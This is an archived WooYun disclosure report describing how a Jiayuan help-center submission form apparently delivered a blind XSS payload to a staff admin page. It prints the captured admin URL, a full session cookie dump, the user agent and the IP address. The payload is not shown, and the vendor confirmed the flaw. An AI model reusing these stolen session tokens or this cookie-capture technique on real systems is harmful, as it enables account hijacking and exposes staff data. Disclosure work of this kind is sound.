乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-19: 细节已通知厂商并且等待厂商处理中 2016-01-21: 厂商已经确认,细节仅向厂商公开 2016-01-31: 细节向核心白帽子及相关领域专家公开 2016-02-10: 细节向普通白帽子公开 2016-02-20: 细节向实习白帽子公开 2016-03-05: 细节向公众公开
佳缘那么多妹子,x呀x……咳咳~你们想不想X???
其实……我是抱着试试看的态度去的……
帮助中心最下面提交问题处(要登录)
http://www.jiayuan.com/helpcenter/postmail2.php?refresh=1&pid=294&id=336
然后就蛋疼的等待着……过会就出现了让我朝思暮想的信息
location : http://check.jiayuan.com/admin.php?mod=jy_service&file=mastermail&action=view&newac=newpage&id=4822133&lang=zhtoplocation : http://check.jiayuan.com/admin.php?mod=jy_service&file=mastermail&action=view&newac=newpage&id=4822133&lang=zhcookie : stadate1=127653735; myloc=71%7C7101; myage=26; mysex=m; myuid=127653735; myincome=30; save_jy_login_name=51505124747%40163.com; w_uk=20140706oJdvhl51t12; pgv_pvi=8083514368; __utma=82118797.873645300.1415169782.1415169782.1415169782.1; jy_ztlogin_zadan_29968824=zadan; jy_ztlogin_zhanbu_103214758=zhanbu; jy_ztlogin_llkan_103214758=llkan; jy_ztlogin_dafuweng_111386909=dafuweng; jy_ztlogin_dafuweng_103214758=dafuweng; pop_1436857144=1451014599035; pop_1408437601=1451811676914; buyhistory=106477258%2523%2523%2523%2523%25231451722843; FTtrgQEItkusername=LF_wangyahui; last_login_time=1453174767; upt=0eYFtf4XStLw6cxfR4ZiAKcYX1lFuA6ZjbkkYd4sjxv5ULu5c%2Aar39y4-gfNkjvDCLBSxRXkKp7kz-Ino3fn9v6AelFWRsQ.; buyhistory_v2=%2522%2522; PHPSESSID=4d0c955b218a1f4d1dbdfd586af4db10; DaSu92Mk8Kncauth=BVdaBT1aWlwOUAcCVAdVWwcFUwQAV1NVUFAEWVBbUF1WUgcADQ%3D%3D; DaSu92Mk8Knccookietime=0; BTSESSID=b37cebe556fa8747ac6490e95d81e37d; SESSION_HASH=28ded3a8ad0629ce55dfe3d50c4a9bfd3b6f9351; user_access=1; global_user_key=6cf83475a6dbd1a7b34937fbae66136b; PROFILE=128653735%3A0804%3Am%3Aimages2.jyimg.com%2Fw4%2Fglobal%2Fi%3A4%3A%3A0%3Azwzpytx_m.jpg%3A1%3A2%3A60%3A10; RAW_HASH=HtTkDGHpiLS7-4-%2A5U70Z9Hm7LsaxGxv0odAM1gmqBE4oOAsfexYGWbMv200mKfzzrvRhIlKrj%2AbW59RL7yiEKnFqPYBM2exaAAwp5XBQUSLJIc.; COMMON_HASH=eeb1db8a7dc300444ade2ae78bcf6ea0; pclog=%7B%22128653735%22%3A%221453174870878%7C1%7C0%22%7D; IM_S=%7B%22IM_CID%22%3A5702007%2C%22svc%22%3A%7B%22code%22%3A0%2C%22nps%22%3A0%2C%22unread_count%22%3A%2238%22%2C%22ocu%22%3A0%2C%22ppc%22%3A0%2C%22jpc%22%3A0%2C%22regt%22%3A%221418609050%22%2C%22using%22%3A%22%22%2C%22user_type%22%3A%2210%22%2C%22uid%22%3A128653735%7D%2C%22IM_SV%22%3A%22211.151.166.131%22%2C%22m%22%3A0%2C%22f%22%3A0%2C%22omc%22%3A0%7D; IM_CS=0; IM_ID=4; IM_TK=1453177342423; IM_M=%5B%7B%22cmd%22%3A54%2C%22data%22%3A%7B%22m%22%3A0%2C%22f%22%3A0%2C%22omc%22%3A0%7D%7D%5D; IM_CON=%7B%22IM_TM%22%3A1453177339526%2C%22IM_SN%22%3A4%7Dopener :
HTTP_REFERER : http://check.jiayuan.com/admin.php?mod=jy_service&file=mastermail&action=view&newac=newpage&id=4822133&lang=zhHTTP_USER_AGENT : Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0REMOTE_ADDR : 119.255.42.194
然后后台不能访问……就不继续了……
……
危害等级:中
漏洞Rank:9
确认时间:2016-01-21 17:39
毕竟漏洞是真是存在的,不过因为很难进入后台,Rank恕不能给你太高,免得你骄傲。【呲牙】
暂无